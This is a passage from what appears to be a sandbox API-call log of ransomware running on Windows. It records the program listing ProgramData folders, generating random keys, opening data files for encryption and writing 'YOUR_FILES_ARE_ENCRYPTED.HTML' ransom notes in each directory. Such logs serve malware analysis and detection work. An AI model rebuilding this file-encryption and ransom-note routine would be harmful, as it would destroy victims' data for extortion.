ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x5ca238d5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.929] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x5ca238d5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.929] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x5c9fd775, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5c9fd775, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x60, cFileName="qmgr0.dat", cAlternateFileName="")) returned 1 [0156.929] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned 57 [0156.929] lstrcmpW (lpString1="qmgr0.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.929] PathFindExtensionW (pszPath="qmgr0.dat") returned=".dat" [0156.929] lstrlenW (lpString=".dat") returned 4 [0156.929] PathFindExtensionW (pszPath="qmgr0.dat") returned=".dat" [0156.929] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 
[0156.930] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.930] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x5ca238d5, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5ca238d5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x60, cFileName="qmgr1.dat", cAlternateFileName="")) returned 1 [0156.930] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned 57 [0156.930] lstrcmpW (lpString1="qmgr1.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.930] PathFindExtensionW (pszPath="qmgr1.dat") returned=".dat" [0156.930] lstrlenW (lpString=".dat") returned 4 [0156.930] PathFindExtensionW (pszPath="qmgr1.dat") returned=".dat" [0156.930] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.930] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.930] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x5ca238d5, 
ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5ca238d5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x60, cFileName="qmgr1.dat", cAlternateFileName="")) returned 0 [0156.930] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.931] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0156.931] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.931] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.934] CloseHandle (hObject=0x4a8) returned 1 [0156.934] GetProcessHeap () returned 0x270000 [0156.935] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.935] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x5ca238d5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 0 [0156.935] FindClose (in: 
hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.935] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0156.935] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\network\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.936] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.938] CloseHandle (hObject=0x598) returned 1 [0156.939] GetProcessHeap () returned 0x270000 [0156.940] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.940] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x1934ad10, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x1934ad10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Office", cAlternateFileName="")) returned 1 [0156.940] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Office") returned 35 [0156.940] GetProcessHeap () returned 0x270000 [0156.940] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.940] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Office" | out: 
lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Office") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Office" [0156.940] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Office", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\*" [0156.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x1934ad10, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x1934ad10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.941] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x1934ad10, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x1934ad10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.941] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x1934ad10, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x1934ad10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ClickToRunPackageLocker", cAlternateFileName="CLICKT~1")) returned 1 [0156.941] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\ClickToRunPackageLocker") returned 59 [0156.941] lstrcmpW (lpString1="ClickToRunPackageLocker", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.941] PathFindExtensionW (pszPath="ClickToRunPackageLocker") returned="" [0156.941] lstrlenW (lpString="") returned 0 [0156.941] PathFindExtensionW (pszPath="ClickToRunPackageLocker") returned="" [0156.941] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1934ad10, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x1934ad10, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x1934ad10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ClickToRunPackageLocker", cAlternateFileName="CLICKT~1")) returned 0 [0156.941] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.941] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0156.941] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\office\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.942] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.944] CloseHandle (hObject=0x598) returned 1 [0156.944] GetProcessHeap () returned 0x270000 [0156.945] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: 
hHeap=0x270000) returned 1 [0156.945] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c5a92b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xd2cc8ee0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xd2cc8ee0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0156.945] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform") returned 61 [0156.945] GetProcessHeap () returned 0x270000 [0156.945] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.945] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform" [0156.945] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*" [0156.946] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c5a92b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xd2cc8ee0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xd2cc8ee0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.946] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c5a92b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xd2cc8ee0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xd2cc8ee0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.946] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7d2c0bb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x9337e7d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x9337e7d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Cache", cAlternateFileName="")) returned 1 [0156.946] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned 67 [0156.946] GetProcessHeap () returned 0x270000 [0156.946] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.946] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" [0156.946] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*") 
returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*" [0156.946] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7d2c0bb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x9337e7d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x9337e7d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.947] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7d2c0bb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x9337e7d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x9337e7d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.947] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9337e7d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x9337e7d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7cbc2cf0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x13d68, dwReserved0=0x0, dwReserved1=0x60, cFileName="cache.dat", cAlternateFileName="")) returned 1 [0156.947] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned 77 [0156.947] lstrcmpW (lpString1="cache.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 
[0156.947] PathFindExtensionW (pszPath="cache.dat") returned=".dat" [0156.947] lstrlenW (lpString=".dat") returned 4 [0156.947] PathFindExtensionW (pszPath="cache.dat") returned=".dat" [0156.947] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.947] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0156.947] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=81256) returned 1 [0156.947] GetProcessHeap () returned 0x270000 [0156.948] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73f0050 [0156.951] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="3A") returned 2 [0156.951] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="13") returned 2 [0156.951] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="EA") returned 2 [0156.951] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="BE") returned 2 [0156.951] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="8E") returned 2 [0156.951] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D7") returned 2 [0156.951] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="67") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="82") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B5") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="65") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="00") returned 2 [0156.952] wsprintfW (in: 
param_1=0x4ebda62, param_2="%02X" | out: param_1="6B") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="F4") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="AA") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="59") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="00") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="68") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="4E") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="FB") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="44") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="BB") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="0B") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="58") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="40") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="52") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="99") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="44") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="99") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="7F") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="6C") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="B6") returned 2 [0156.952] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="14") returned 2 [0156.953] lstrcpyW (in: lpString1=0x7400104, 
lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" [0156.953] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x73f0050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.953] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73f0050, lpOverlapped=0x73f0050) returned 1 [0156.953] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9337e7d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x9337e7d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7cbc2cf0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x13d68, dwReserved0=0x0, dwReserved1=0x60, cFileName="cache.dat", cAlternateFileName="")) returned 0 [0156.953] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.953] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0156.953] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.954] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: 
lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.956] CloseHandle (hObject=0x4a8) returned 1 [0156.956] GetProcessHeap () returned 0x270000 [0156.957] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.957] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8151b0f0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xd2cc8ee0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xe234d540, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x2ae74a, dwReserved0=0x0, dwReserved1=0x60, cFileName="tokens.dat", cAlternateFileName="")) returned 1 [0156.957] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat") returned 72 [0156.957] lstrcmpW (lpString1="tokens.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.957] PathFindExtensionW (pszPath="tokens.dat") returned=".dat" [0156.957] lstrlenW (lpString=".dat") returned 4 [0156.957] PathFindExtensionW (pszPath="tokens.dat") returned=".dat" [0156.957] SystemFunction036 (in: 